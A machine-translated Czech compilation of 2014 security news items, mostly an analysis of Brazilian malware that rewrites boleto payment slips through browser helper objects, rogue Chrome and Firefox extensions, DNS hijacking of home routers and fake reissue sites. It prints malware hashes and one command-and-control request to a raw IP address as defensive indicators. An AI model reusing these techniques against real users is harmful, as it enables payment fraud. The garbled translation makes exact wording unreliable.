místě. Firmy, které vyžadují větší transparentnost dodavatele a hledají efektivní metody pro hodnocení aplikací a řízení spotřeby budou snadněji přijmout oblak a pohybovat kolem tohoto období nejistoty. "


Bezplatný nástroj zjednodušuje SHA-2 migraci pro správce systému
29.9.2014 Nástroje
DigiCert vydala bezplatný nástroj, který pomáhá správcům systému analyzovat jejich použití SHA-1 šifrovací algoritmy v rámci všech domén a subdomén a zmapovat cestu pro SHA-2 migraci. oznámení společnosti Google, že by urychlit odmítání SHA-1 certifikátu , včetně poskytování nedůvěryhodný upozornění na místa s SHA-1 certifikáty, jejichž platnost skončí v roce 2016, je nezbytné pro mnoho správců přejít na SHA-2, které již v listopadu nebo riziko jejich zákazníci obdrží degradované indikátorů důvěry v Chrome. Použití DigiCert SHA-1 Sunset nástroj , Správci mohou určit období platnosti pro jejich SHA-1 SSL certifikátů a získávat informace o tom, jak nová politika společnosti Google bude mít vliv na interakci uživatele s těmito certifikáty. DigiCert vydává nové certifikáty s SHA-2, ve výchozím nastavení, a učinil tak za téměř rok. Pro ty, kteří se rozhodli přenést své stávající SHA-1 na novou DigiCert vydaného certifikátu SHA-2, bude DigiCert poskytovat bezplatnou výměnu odpovídající délku stávající licenční certifikát období, bez ohledu na to, zda jsou či nejsou zákazníky DigiCert. "S rušné vánoční nákupní sezóna přibližování a hrozba nižší úrovně zkušeností důvěru uživatele rýsuje pro uživatele Chrome, DigiCert podniká další kroky, které pomohou zmírnit břemeno zrychlených SHA-2 migračních časových pro správce, "řekl generální ředitel DigiCert Nicholas Hales. "Náš nový SHA-1 Sunset nářadí ušetří čas a úsilí tím, že poskytuje komplexní analýzu organizace certifikátu krajinu, včetně tam, kde existují SHA-1 certifikáty, které software a hardware podpora SHA-2, a hodnocení toho, jak nové časové osy Google může mít vliv na danou lokalitu. Také jsme pochopili, že SHA-2 migrace zahrnuje systém a zařízení upgrady nákladné pro organizace, a tak jsme se nabídnout, aby odpovídala zdarma na zbývající část funkčního období existující SHA-1 certifikátu, který je přeměněn na SHA-2. " Některé klíčové časové osy jsou důležité mít na paměti, pokud jde o Google SHA-1 odmítání:

Listopad 2014 - SHA-1 SSL certifikáty skončí kdykoliv v roce 2017 ukáže varování v Chrome.
Prosinec 2014 - SHA-1 SSL certifikáty, jejichž platnost skončí po 1.6.2016 se zobrazí varování v Chrome.
1. čtvrtletí 2015 - SHA-1 SSL certifikáty, jejichž platnost skončí nějaký čas v roce 2016 se zobrazí varování v Chrome.
Navíc, Microsoft oznámil následující SHA-1 odmítání časové osy:
01.01.2016 - Certifikační autority se musí zastavit vydávání nových SHA-1 SSL a podepisování kódu certifikáty.
Microsoft přestane věřit SHA-1 certifikátů podpisu kódu bez časových razítek.
01.1.2017 - Microsoft přestane věřit SHA-1 SSL certifikáty.


Hackeři pronikli systémy klíčových vojenských zakázkách
29.9.2014 Incidenty
Hackeři spojené s čínskou vládou úspěšně pronikli do počítačových systémů dopravy USA velení dodavatelů alespoň 20 krát v jednom roce, průniky, které ukazují, zranitelná místa v systému armády rozmístit vojáky a vybavení v krizi, vyšetřovací komise Senátu branného našel . Vyšetřování celoroční zjistil, že TRANSCOM, který je zodpovědný za globální pohyb vojáků a vybavení v USA, si byl vědom pouze dvou z těchto průniky. Dále bylo zjištěno, mezery v požadavky a nedostatek sdílení informací mezi vládními subjekty, které opustily příkaz z velké části vědomi počítačových kompromisů Číny dodavatelů, které jsou klíčem k mobilizaci a nasazení vojenských sil hlášení. "Musíme zajistit, aby kybernetické útoky nemohou narušit Naším posláním připravenost "řekl senátor Jim Inhofe, R-OK, postavený člen výboru. "Je důležité, že jsme dali na místo centrální clearinghouse, který usnadňuje pro kritické dodavatele, zejména těch, které jsou malé a střední podniky, hlásit podezřelé kybernetické aktivity bez přidání zátěže svých operací na podporu mise." vyšetřovací komise zaměřené na malé -recognized ale životně důležité americké vojenské aktiv: schopnost proniknout civilní leteckou, lodní a jiných dopravních prostředků rychlého nasazení amerických sil v dobách krize. Prostřednictvím programů, jako je například civilní rezervního letadlového parku, obchodních dopravních společností, z nichž někteří dělají málo nebo žádný OS ČR, vztahující se k podnikání v době míru, staly klíčovými prvky plánů TRANSCOM pro dojemné vojáky a zařízení po celém světě. Výbor zjistil, že v 12 -month období, které začíná 01.6.2012, tam bylo asi 50 útoky nebo jiné kybernetické události do počítačových sítí dodavatelů TRANSCOM. Nejméně 20 z nich bylo úspěšné útoky připisované na "pokročilé trvalé hrozby", termín používaný k označení sofistikované hrozby obyčejně spojený s vládami. Všechny tyto zásahy byly přičítány do Číny. Mezi zjištění šetření, je:

Čínská armáda vniknutí do TRANSCOM dodavatele v letech 2008 a 2010, že ohrožení e-maily, dokumenty, uživatelské heslo a počítačového kódu.
2010 vniknutí čínské armády do sítě a CRAF dodavatele, ve kterém byly odcizeny doklady, údaje o letu, pověření a hesla pro šifrované e-maily.
2012 čínská armáda vniknutí do více systémů na palubě obchodní lodi smluvně TRANSCOM.
Šetření ukázalo závažné nedostatky ve sdílení informací týkajících se kybernetické průniky. Průzkum výbor malou podmnožinu dodavatelů TRANSCOM objevil 11 vniknutí do Číny do dodavatelských sítí. Při šetření bylo rovněž zjištěno, že FBI nebo DoD byli vědomi nejméně devět dalších úspěšných zásahy ze strany Číny do dodavatelů TRANSCOM. Z těchto 20 průniky, TRANSCOM byl jen upozorněn dva. To rozdíl byl částečně výsledkem dodavatelů a TRANSCOM chybí společné chápání toho, co útoky by měly být hlášeny TRANSCOM. Také DoD agentury nemají jasnou představu o tom, jaké informace o počítačové zásahy mohou a měly by být sdíleny s TRANSCOM a dalších agentur v rámci oddělení. Výbor rovněž zjistil, že hlášení cyber narušení požadavky jsou zaměřené na zásahy, které ovlivňují DoD data. Někteří dodavatelé TRANSCOM, jako je několik craf leteckých společností, ale mohou dělat jen málo nebo žádný obchod s armádou až do vyzval v krizi. V době míru útoky na ty společnosti, se nemůže vztahovat na okamžitou ztrátu vojenských informací, ale mohl opustit ty společnosti, zranitelné ke ztrátě informací nebo narušení provozu, jsou-li aktivován na podporu vojenských operací. V reakci na zjištění šetření,, výbor zahrnoval ustanovení v jeho znění zákona o národní obrany povolení pro fiskální rok 2015 zaměřené na řešení mezer podávání zpráv a zlepšit způsob, jakým ministerstvo šíří informace o kybernetické průniky do počítačových sítí provozně kritických dodavatelů. "Národní státy a zločinecké syndikáty se nás útočí. Je to stejně důležité v dnešním světě na ochranu kritických informačních systémů a infrastruktury naší země, jak je chránit námořní koridory a zahraniční ekonomické zájmy, "řekl Carl Wright, generální ředitel TrapX bezpečnosti, dříve CISO americké námořní pěchoty.


FBI se nelíbí šifrování mobilních zařízení

29.9.2014 Zabezpečení
Podle americké bezpečnostní agentury nová technika usnadňuje práci kyberzločinců.

Podle šéfa FBI Jamese Comeye je snadný přístup k uživatelským datům důležitý při ochraně lidských životů. Zmínil při tom hlavně hrozbu terorismu a únosů.

Comey tak reagoval na zavedení automatického šifrování dat v chytrých telefonech od Googlu a Applu. Ze strany obou společností jde podle něj pouze o marketingový tah.

FBI dokonce kontaktovala Apple i Google, aby jim vyjádřila své znepokojení nad novým přístupem.

Google o zavedení automatického šifrování informoval minulý týden. Apple tuto metodu zavedl v novém operačním systému iOS8.

Comey se svým vyjádřením přišel jen pár dní poté, co jeho dřívější spolupracovník Ronald Hosko zveřejnil sloupek v deníku The Washington Post, ve kterém rovněž přístup Googlu s Applem zkritizoval. Také on vyjádřil názor, že automatické šifrování usnadní práci zločincům.

Apple ani Google se ke Comeyeho námitkám zatím ne nevyjádřily.


No, to eskalovalo rychle
Penny-krást malware multi-miliónové loupeže, rychlý přehled o Bitcoin Bonanza v digitálním věku

26.9.2013 Viry
Zajímavý titul cítil jen o právu na zajímavé téma, když jsem poprvé předložena můj výzkum papír o vývoji Bitcoin kyberkriminality letošního ročníku Virus Bulletin konferenci, která se konala v bezesnou Seattlu. Diskutovat o situaci z ekonomického hlediska jsem se zaměřila namalovat obraz odrážející jak současná geopolitická situace v Latinské Americe je region úrodnou půdou pro Bitcoin nadšence, a potažmo i zločinci. Je to určitě není snadné zachytit snímek z jevů, které se mění tak rychle, a předloží ji do skupiny bezpečnostních odborníků, kteří jsou již dobře informováni o toto téma. Nicméně, s pomocí regionálních statistik, nehod časových a analýza nejzajímavějších vzorků malwaru, je zde dostatek informací v této zprávě dát nějaké jasné ukazatele o tom, co se děje s světově nejpopulárnější cryptocurrency minulý rok, a to, co jsme lze očekávat, že v budoucnu, pokud jde o Bitcoin-související s počítačovou kriminalitou.

Zatímco někteří inovátoři byli zapojeni do trhu Bitcoin od počátku (formou těžby nebo prostě účastí na výměnách), ostatní jsou jen uchopit koncept cryptocurrencies a učení o nebezpečích Bitcoin po zlém - ať už je to v forma ransomware požadují rychlou platbu nebo škodlivý důlní kód náročné svých omezených výpočetních zdrojů. Z peněženky krást malware ve velkém měřítku Bitcoin výměnných loupeže, můžeme najít téměř cokoliv ve cryptoworld, a to je jen začátek. V současné době hovoříme o malwaru a počítačové kriminalitě jako dvě strany téže mince (bit), obvykle se odkazovat na organizované posádky zločinců s jasně definovanými rolemi zapojení do nedovolené činnosti s jediným účelem finančního zisku. To dává smysl, pak pozorovat korelaci mezi počtem vzorků malwaru ve volné přírodě cílení Bitcoin uživatelů a ceny měny dochází k výměně na světových trzích.

pontiroli_1

Více uživatelů, více útoků: Kaspersky Lab statistiky ukazují nárůst Bitcoin počítačové kriminalitě

Jak již bylo zmíněno v 2013 v bulletinu zabezpečení společnosti Kaspersky je naše předpovědi pro cybercriminal Bitcoin ekosystém se stal skutečností - a pak některé : "Útoky na Bitcoin bazény, výměny a uživatelů Bitcoin se stane jedním z nejvíce high-profil témata roku útoků na burzách cenných papírů. bude zejména mezi podvodníky, protože jejich poměr nákladů a výnosů je velmi příznivá.

Pokud jde o uživatele Bitcoin, v roce 2014 očekáváme výrazný nárůst počtu útoků na jejich peněženky. Dříve, zločinci infikovaných počítačů obětí a šel na jejich využití pro těžbu. Nicméně, tato metoda je nyní mnohem méně efektivní než dříve, zatímco krádež Bitcoins slibuje zločinci obrovské zisky a kompletní anonymitu. "

Je to dlouhá doba, co jsme se dostali až za týden, aniž by jeden z hlavních Bitcoin burzách dělat hlavní zprávy. Můžeme atribut Úspěch některých útoků na chybné technické implementace Bitcoin peněženky, jiní spoléhali na chytré sociálního inženýrství přístupy, a zbytek může být obviňován na špatných obchodních praktik a prosté nedbalosti o dodržování již osvědčené bezpečnostní normy. Tam jsou jen příliš mnoho případů do seznamu, ale tam je společným jmenovatelem je všechny sjednotit, což je velký soubor zkušeností pro budoucí generace Bitcoin výměnu stavět dělá.

Teprve nedávno jsme viděli, proč země jako Argentina a Brazílie, se staly živnou půdou pro přijetí cryptocurrency ekonomiky, a jak jsme si to uvědomují, a proto mají i zločinci. Díky celé řadě nových podvodů, podvodů a hrozeb, kterým čelí Bitcoin práv, občané si musí být vědomi, že udržet své úspory v bezpečí není snadný úkol v dnešní hyper propojeném světě. Protože nejsou tam žádné hranice pro cryptocurrencies, není tomu tak pro zločince a to buď, a po pohyb peněz znamená, že přistání v Latinské Americe, kde se valná publikum je stále široce vystaveny mnoha útokům vidět v jiných částech světa.

Po Mt. GOX incidentu jsme byli svědky cílené phishingové kampaně, Bitcoin členů komunity načerno, jak soukromých detektivů, lokalizovaných vzorků ransomware, podvody, mobilní horníků, internet věcí, zařízení, které se účastní botnetů, a všeho ostatního, že tento digitální Bitcoin zlatá horečka přivedla na nás.

pontiroli_2

Analýza, malware z mt GOX Leak Archiv

Být vaše vlastní banka je mnohem obtížnější, než se zdá

Alchemy ukázalo možné cryptocurrency nadšence, soustružení energii do hlavního města, sází na úspěch a globální přijetí své oblíbené volby. Při pohledu zvenčí jako koníček pro mágů, Bitcoin je více než měna, je to komunita, která má určité hodnoty zakořeněny, a to revoluci finanční svět, jak v současné době vědět.

Kolektivní ale anonymní, organizovaný ještě decentralizované, to nařídil chaos začíná dávat smysl po všech těch problémech, co s nimiž se potýkají. Utracení nadbytečných výměn, které bývaly k dispozici přináší darwinovské rovnováhu na Bitcoin ekosystému, nutit ty vlevo zavést lepší obchodní praktiky a bezpečnostní opatření.

Malware trendy naznačují, že zločinci se stěhuje z těžby botnety a bazény k přímější peněženku krádeže a výměny pověření unese. Neefektivní těžby trojské koně pracují na mobilních zařízeních prokázala, že přístup k finančním prostředkům uloženým v digitálním peněžence oběti může být mnohem jednodušší, než uvedení úsilí do budování masivní síť horníků, které sklízejí minimální zisky.

Debetní karty spojené s Bitcoin peněženky se začínají objevovat, a to přináší další lákavou vstupní bod pro zločince. S "bitwashing" služby stále častější, sledování odcizených finančních prostředků se ukáže mnohem obtížnější v budoucnu vystavovat skutečnou anonymní povahu cryptocurrencies.

Jakmile volby de facto pro překupníky drog a ilegální trhy, Bitcoin se snaží získat globální důvěru ostatních obchodníků, doufám, že to bude mít hotový společenství podporovat ji, když se stane výchozím standardem pro on-line i off-line transakcí. Můžete si přečíst celý dokument předložený na Virus Bulletin zde .


Útoky proti Boletos
Krádež peněz z offline uživatele

26.9.2013 Kriminalita

Úvod

José je velmi podezřelý člověk. Nikdy používá internetové bankovnictví, nebo si koupí něco za použití kreditní karty. Opravdu, on nemá ani jeden. On nevěří žádné z těchto moderních technologií v nejmenším. Je si dobře vědom všech rizik, které existují on-line, takže José raději držet svůj život offline. Nicméně ani to by ho zachránil od dnešních zločinci. Ztratil více než 2000 dolar za jediný den: José byl p0wned pomocí čárového kódu a kus papíru.

Brazilský podvodníci vytvořili jedinečný způsob, jak krade peníze z těchto opatrný, off-jen typů: Změna " boletos ", populární bankovní doklady vydané bankami a všechny druhy podniků v ​​Brazílii. Boletos jsou ve skutečnosti jedním z nejpopulárnějších způsobů, jak platit účty a nakupují zboží v Brazílii - dokonce i vládní instituce používat - a jsou unikátní vlastnost na brazilském trhu.

V sérii on-line útoků na nedostatky týkající se síťových zařízení - zejména DSL modemy - a zahrnujících nebezpečné DNS servery, falešné doklady, injekce prohlížeč kódu ve stylu SpyEye, rozšíření škodlivých prohlížeče a hodně kreativity, podvodníci úspěšně ukradl velké množství peněz, a to i od lidí, kteří nemají kreditní karty nebo internetového bankovnictví účty. Je to nová starost pro banky a finanční instituce v zemi.

Tento článek vysvětluje, jak tyto útoky se stalo v Brazílii, a poskytuje poradenství v oblasti ochrany spotřebitelů, i když se v minulosti rozhodly žít v režimu offline.

Boleto Bancário: brazilský platební systém

Boletos jsou velmi populární a snadný způsob, jak platit účty, nebo koupit zboží v Brazílii dnes; i on-line obchody přijme tento druh platby. Vše, co musíte udělat, je vytisknout a zaplatit. Podle brazilské centrální banky 21% všech plateb v zemi v roce 2011 byly provedeny pomocí boletos.

Boleto_malware_1

Preferované způsoby platby v Brazílii v roce 2011

Podle e-bit 18% všech e-commerce transakcí v Brazílii v roce 2012 použito boletos jako preferovaný způsob platby:

Boleto_malware_2

Preferovaný způsob platby on-line v Brazílii v roce 2012

Boleto přichází s datem platnosti. Před tímto datem může být vyplacena z bankomatů, poboček a internetového bankovnictví jakékoli banky, pošta, loterie agentů a některých supermarketů až do jeho splatnosti. Po uplynutí může být vyplacena pouze na pobočce vystavující banky. Klient také platí poplatek účtovaný bankou; Poplatek se zvyšuje s každým dalším dnem. Banky účtovat manipulační poplatek za každý Boleto zaplacené v zákazníkem. Tento poplatek se pohybuje od 1,00 do BRL BRL 12,00, v závislosti na bance. Pokud je kolekce registrován pak banka bude také účtovat poplatek za každou vydanou Boleto, bez ohledu na to, zda bylo zaplaceno, či nikoli. Proto neregistrované sbírky jsou vhodnější pro on-line transakcí.

Banka rovněž bere v úvahu velikost klienta, takže klient s vyšším objemem bankovních operací, který pracuje s bankou na chvíli, atd, je schopen získat nižší poplatky, nebo dokonce osvobození od poplatku, který dělal boleto velmi důležitý prodejní nástroj uvnitř velkých firem, e-commerce a vlády. Pokud se společnost chce podnikat v Brazílii, je nezbytné použít boletos - Apple , Dell, Skype , Microsoft, DX.com , Alibaba.com , a dokonce i FIFA ve Světovém poháru 2014 používal to v místních operací.

Boleto_malware_3

Nákup kreditu Skype se boleto Bancário jako způsob platby

To je základní struktura tištěného boleto Bancário:

Boleto_malware_4

Boleto Bancário pro začátečníky podle TheBrazilBusiness.com

Emitent Banka:finanční instituce odpovědné za vydávání a shromažďování na základě dohody mezi ním a obchodníkem. Banka, jakmile oprávněn vybírat platby za obchodníka, připíše dlužné částky klientem na bankovním účtu obchodníka.
Identifikační pole: číselné vyjádření čárového kódu, který obsahuje všechny údaje potřebné k identifikaci bankovní účet obchodníka a zrušte platbu. Toto pole se používá v domácí a samoobslužné bankovnictví.
Čárový kód: kód se skládá ze skupiny tištěných a různě vzorované pruhy (vždy 103 mm na délku a 13 mm na výšku) a mezery a někdy i číslice, která jsou určena pro skenování a čtení digitálním laserovým skenerem a že obsahuje informace potřebné k určení objektu to etikety.
Zaplatit Boleto u banky nebo on-line vše, co je třeba, je skenování čárových kódů - pokud je to nečitelné (kvůli špatnému tisku) mohou uživatelé namísto toho druhu v 44-číslo identifikační kód. Některé banky mají čtečku čárových kódů ve svých mobilních aplikací, takže mbanking uživatelé nemusí zadávat ID pole; mohou zaplatit Boleto pomocí fotoaparátu jejich zařízení.

Boleto_malware_5

Placení Boleto pomocí skeneru čárového kódu

Co by se mohlo pokazit? No, jak se o změně čárový kód nebo ID pole? Je to jednoduché a znamená, že platby lze přesměrovat na jiný účet. To je přesně to, co brazilské podvodníci začali dělat - a nejjednodušší a efektivní způsob, jak se pomocí malware .

Brazilský boleto malware

Boleto mohou být generovány a vytištěny v obchodě, který prodává své produkty pro vás, nebo i uživatelé se během on-line nákupního procesu. Je zobrazena v prohlížeči, obvykle v režimu HTML, pomocí volných knihoven k dispozici vývojářům implementovat do jejich ERP softwaru, nebo v jejich internetovém obchodě systému.

Boleto_malware_6

BoletoPHP je volný zdroj pro vývojáře, jak generovat boletos pomocí PHP

Rozsáhlá dokumentace a legitimní open source software používaný k výrobě boletos pomáhá tvůrcům malwaru rozvíjet trojské koně, které jsou naprogramovány pro změnu boletos místně, jakmile jsou vytvořeny na počítači nebo prohlížeči. Tyto trojské koně byli spatřeni v přírodě v dubnu 2013 od LinhaDefensiva.com a jsou stále distribuovány dnes v Brazílii. Ve skutečnosti většina brazilských zločinců, kteří využívají Trojan bankéře ukrást peníze přecházejí jejich útoky se zaměřují boletos pomocí stejnou infrastrukturu.

První generace se rozhodli změnit číslo ID pole a čárový kód:

Boleto_malware_7

Boleto upravena brazilského Trojan: nové identifikační číslo a čárový kód přesměrovat platby na účet podvodníka

Některé verze malwaru používají injekce JavaScript měnit obsah Boleto:

Boleto_malware_8

"CodBarras" znamená, že čárový kód v portugalštině

Některé novější verze tohoto Trojan objevil a začal měnit pouze čísla v poli ID:

Boleto_malware_9

"Linha Digitável" znamená typeable řádek v portugalštině; je to číslo ID pole

Tato nová verze také používal rozpětí HTML prvek, aby bylo možné přidat bílé místo s čárovým kódem, což je nečitelný. To nutí personál zákazníka nebo bankovní psát zfalšovaná 44-místné pole ID zaplatit Boleto. Tak, aby nedošlo ke zvýšení podezření, Trojan nemění hodnotu a datum splatnosti pro transakce:

Boleto_malware_10

HTML stránky změní Trojan a dodal, bílý prostor, aby vyvrátila čárového kódu, zdroj LinhaDefensiva.org

ID pole obsahuje velké množství informací, popisovat bankovní účet, který bude přijímat platby a další údaje používané v souladu s pravidly stanovenými každé banky. V "Nosso Numero" data ("Naše Číslo") je jedinečný identifikátor, pro každý Boleto. Změna identifikačního čísla je dost přesměrovat platby na jiný bankovní účet.

Boleto_malware_11

Pochopení pole ID na boletos

Protože většina boletos jsou nyní generovány v prohlížeči, Trojan zaměření uživatele Internet Explorer instaluje BHO připraven ke komunikaci s C & C a monitorovat provoz, hledá slova, jako jsou "Boleto" a "pagamento" (platba), výběr ten správný okamžik pro vstříkněte kód a výměna identifikační číslo uložené ve formátu HTML s novou, stažený z C & C.

Boleto_malware_12

Je to jako SpyEye: Kód injekce v části prohlížeče

Zpočátku většina z nich BHO má velmi nízkou míru detekce, nesprávně označen jako trojské bankéř normálními antimalware produkty (například MD5s 23d418f0c23dc877df3f08f26f255bb5 a f089bf60aac48e24cd019edb4360d30d ). Jeden příklad žádosti těchto BHO a reakci s novým identifikačním číslem být aplikován:

Request: http://141.105.65.5/11111.11111%2011111.111111%2011111.111111%201%201111111111 Response: 03399.62086 86000.000009 00008.601049 7 00000000000000

Ohrožena webové stránky mohou rovněž obsahovat skripty, které generují nové identifikační číslo pro tyto boletos:

Boleto_malware_13

Nebo něco konstrukce vnést nejen nový identifikační číslo, ale nový čárový kód i:

Boleto_malware_14

Našli jsme také velmi profesionální ovládací panely používané podvodníky sbírat data z infikovaných počítačů, a jakmile je generován registrovat každý Boleto. Je to stejné, infrastruktura používá při vývoji Trojan bankéřů, jako podvodné boleto je nový způsob, jak ukrást peníze od uživatelů.

Boleto_malware_15

Ovládací panel špatný člověk k ovládání infikovaných počítačů

Některé panely nabízejí mnoho detailů, aby podvodníci, jako jsou data / hodiny boleto byl vytvořen / změněn, staré ID pole a nahrazení vstříkne malware, hodnoty a původu -, kde vznikl boleto, jestli je to místní nebo na internetových stránkách.

Boleto_malware_16

Další boleto malware panel

Právě teď je to opravdu snadné najít místa, kde rádoby útočníci si koupit tento toolkit a založit vlastní útoky na boletos. A náklady starter pack o R 500,00 dolarů (asi 250 USD)

Boleto_malware_17

"Jen pro znalce", je boleto sada malware + panel k prodeji na Facebooku

Odkaz Zeus - šifrovaná užitečná zatížení

V boleto malware kampaně v kombinaci několik nových triků, infikovat a krást od více uživatelů. Jedním z nejnovějších je použití non-spustitelné a šifrovaným malware užitečné zatížení XORed s 32-bitovým klíčem a komprimované pomocí zlib pomocí rozšíření .BCK, .JMP, Mod a další.

Boleto_malware_18

Šifrovaný soubor .JMP stažen boleto malware

Není to náhoda, že stejný postup se používá Zeus GameOver gangu. Máme důkazy, brazilské zločinci spolupracující se západními evropskými gangy, které se zabývají Zeus a jeho varianty; to není neobvyklé najít v podzemních fórech hledají vzorků, kupují nové crimeware a ATM / POS malware. První výsledky této spolupráce může být viděn ve vývoji nových útoků, jako ten, zaměření platby boletos v Brazílii.

Používání šifrovaných užitečné zatížení nabízí zločinci efektivní způsob, jak obejít všechny firewally, webfilters, síťové systémy pro detekci vniknutí nebo jiné obrany, které mohou být na místě, jako malý Trojan stáhne šifrované soubory a dešifruje je dokončit infekce.

Boleto_malware_19

Dešifrovat .JMP soubor: normální PE spustitelný

Zachycení SSL conections

Další zajímavý přístup vidět v boleto malware je role Houslista, web proxy, ladící nástroje běžně používané malware výzkumníky. Některé boleto malware využívá ji zachytit SSL komunikace nebo udělat MITM, jehož cílem je změnit boletos vytvořené i v HTTPS stránek.

Našli jsme toto chování ve vzorcích, jako jsou Trojan.Win32.Badur.imwt:

Boleto_malware_20

Boleto Trojan naprogramován použít Fiddler: MITM v SSL stránkách

Malware nainstaluje SSL CERT z FiddlerCore na infikovaný počítač a zachycuje provoz HTTPS stránek.

Boleto_malware_21

Certifikát Šumař instalovat malware

Útoky proti síťových zařízení

Vyšetřování útoku vektor používaný podvodníky a při pohledu na to, jak oběti nakazil jsme zjistili, že všechny možné techniky jsou používány. Útoků sociálního inženýrství pomocí dobře navržených e-mailové kampaně jsou nejrozšířenější, ale nejvíce agresivní cesta zahrnuje masivní použití RCE na zranitelné DSL modemů - v 2011/12 více než 4 miliony těchto zařízení byli napadeni v Brazílii a měl jejich DNS Změny nastavení zločinci - Stejný přístup je stále používán distribuovat malware dnes.

Když ovlivněn uživatel pokusí navštívit oblíbené webové stránky nebo brazilské s webovými portály škodlivý DNS nakonfigurován DSL modemu nabízí instalaci nové Flash Player. Ve skutečnosti, přijetí této instalace bude infikovat počítač s boleto malware.

Boleto_malware_22

Je Google.com hosting instalátor Flash Player? Ne, je to nebezpečný DNS v DSL modem

Další nedávný posun od brazilských zločinců bylo šířit webových útoky domácích směrovačů ve snaze změnit DNS zařízení. Tyto útoky byly nazývány " drive-by-pharmingu ". Je možné rozšířit pomocí škodlivých domén nebo ohrožení oblíbené webové stránky:

Boleto_malware_23

Zpravodajský portál "Estadão" ohrožena: škodlivý skript zeptá heslo domácí router

Škodlivý skript se pokusí uhodnout heslo vašeho domácího routeru. Pokud se podaří nový DNS server bude nastaven v přístroji a zločinci budou kontrolovat veškerý svůj provoz. Pokud se nezdaří ohrožena stránka se zobrazí okno s dotazem na zadání pověření.

Boleto_malware_24

Je heslo vašeho routeru gvt12345? Jen hádat ...

Nedávno jsme identifikovali více než 30 škodlivých DNS servery jsou používány v těchto útocích v Brazílii. Co je nového DNS server dělat? To přesměrování připojení uživatelů, slouží phishingové stránky, nebo dokonce falešné bankovní stránky, které modifikují každý boleto uživatel generuje.

Pokud se zločinci spojí webových útoků se reklamy mohou oslovit miliony lidí. Tato taktika se již používá:

Boleto_malware_25

Jaký je nejrychlejší způsob, jak útočit na domácí routery v Brazílii? Použití reklamy

Pokud se zločinci nemohou ohrozit vaše síťové zařízení, budou zaměřeny na poskytovatele služeb Internetu. Už jsme viděli řadu otravy DNS útoků proti Net Virtua, jeden z největších brazilských ISP. Pokaždé, když cíl je stejný, cílení boletos.

Ale bylo hůř, když zločinci se rozhodl přejít na další on-line přístupu ...

Falešné webové stránky, falešné rozšíření, podvodné boletos

Někteří podvodníci se rozhodl, že šíření jejich trojské koně nestačí. Chtěli rychlejší návratnost a změnili taktiku. Dívali se on-line, investice do sponzorované odkazy, falešné webové stránky, které prohlašovaly, že přepočítat prošlým datem boletos (to je možné s tímto platebním systémem) a škodlivé rozšíření prohlížeče pro Google Chrome nebo Firefox.

Škodlivé Chrome rozšíření, v oficiálním obchodě

Jeden útok začal zprávou slibuje 100 minut zdarma Skype kredit:

Boleto_malware_26

Skype-to-Go zdarma pro uživatele Chrome! Je to jednoduché, stačí nainstalovat rozšíření ...

Proč distribuci trojského koně, když můžete přimět uživatele k instalaci škodlivého rozšíření prohlížeče, který řídí a monitoruje veškerý provoz? To je přesně to, co podvodníci dělali, s cennou pomocí oficiálního Google Chrome Web Store, kde byl hostitelem škodlivého rozšíření:

Boleto_malware_27

Trojan-Banker.JS.Banker.bv

A to nebyl jediný, zjistili jsme, více:

Boleto_malware_28

Trojan-Banker.JS.BanExt.a, naleznete na červen 2014 v obchodě, téměř 2000 uživatelů je nainstalován

A ještě jedna, přestrojený za finanční aplikace, která generuje (falešný) boletos:

Boleto_malware_29

Trojan-Banker.JS.Banker.bx více než 3800 instalací ...

Rozšíření byl připraven stejně jako BHO na infikovaný počítač: sledovat a čekat na okamžik boleto je generován, a pak komunikovat s C & C ...

Boleto_malware_30

Trojan-Banker.JS.Banker.bw

... A získat nové číslo ID pole, vstřikování ji v Boleto zatímco neplatnost čárový kód:

Boleto_malware_31

Zamaskovat jakékoliv záměr objevit skutečný účel prodloužení Tam byl nějaký zmatek hlavního js souboru uvnitř souboru .CRX:

Boleto_malware_32

Prokletý soubor JavaScript

Po odstranění mlžení vidíme webové stránky je to zaměřené na:

Boleto_malware_33

Seznam obsahuje velké brazilské zády a známých internetových obchodů, jako jsou Americanas.com a PagSeguro (servisní podobné PayPal). Zákazníci malých bank neměla uniknout z útoku - škodlivé rozšíření jsou nastavena tak, aby zaměřit se na rozsáhlý seznam místních bank:

Boleto_malware_34

Obrovské množství škodlivých rozšíření výzvy Googlu rozhodnutí na konci května 2014 omezení instalace rozšíření Chrome. Nyní mohou být umístěna pouze na Chrome Web Store, ale to není žádný problém zločinci dát své škodlivé výtvory tam.

Nutit režim pro vývojáře na Google Chrome

Jedním z příkladů je Trojan-Banker.Win32.ClearWind.a . Jejím hlavním cílem je nainstalovat škodlivý rozšíření, které mění boletos, které aktivuje režim pro vývojáře na Google Chrome a nutit instalaci jakéhokoli prodloužení, a to i těch, které nejsou hostované v úředním skladu:

Boleto_malware_35

"Režim pro vývojáře" aktivován na Chrome. Malware to udělal

Tyto trojské koně mohli nakazit spoustu lidí, instalaci škodlivého příponu změnit boletos:

Boleto_malware_36

Trojan-Banker.Win32.ClearWind.a, více než 8000 zařízení

Škodlivý Firefox add-on

Ale pokud používáte Firefox, jsi pořád v ohrožení; tam je verze škodlivý add-on pro tyto uživatele také:

Boleto_malware_37

Pro větší pohodlí padouchy ", škodlivý Firefox add-on je umístěn na Google Storage:

Boleto_malware_38

Trojan-Banker.JS.Banker.cd připraven k instalaci škodlivého addon změnit své boletos

Sponzorované odkazy, falešné webové stránky

Další zajímavou charakteristikou boletos je, že můžete vytvořit protějšek kopii , v případě, ztratíte původní. Některé banky také nabízejí služby zákazníkům, kteří zmeškané platební lhůty a je třeba přepočítat hodnotu prošlou Boleto a zopakujte to, po zaplacení malý poplatek. Všechny společnosti spolupracující s boletos tyto služby nabízet svým zákazníkům, většinou on-line, a útočníci mohou útočit i zde.

Podvodníci se rozhodla zřídit škodlivé webové stránky, které tvrdí, nabídnout znovu odešle nebo přepočet vypršela boletos - ale samozřejmě nový boleto je zcela falešný a přesměruje platby na účet zločinci. Tyto útoky jsou prováděny pomocí vyhledávačů, skupují sponzorovaný odkaz kampaně a dát své podvodné stránky na vrchol výsledků.

Při hledání " calcular boleto vencido "(přepočítat prošlou Boleto) nebo" Segunda přes Boleto "(protějšek kopie) na Google, první výsledek je podvodné služby:

Boleto_malware_39

Google není jediný - je to stejné na Yahoo:

Boleto_malware_40

A Ask.com:

Boleto_malware_41

Nesmíme zapomenout ani na Bing:

Boleto_malware_42

Falešné webové stránky, které údajně nabízejí tyto služby mají velmi profesionální design pomůže oklamat své oběti.

Boleto_malware_43

Vše, co musíte udělat, je vybrat si banku, která vydal Boleto, zadejte údaje a "reissue" to.

Boleto_malware_44

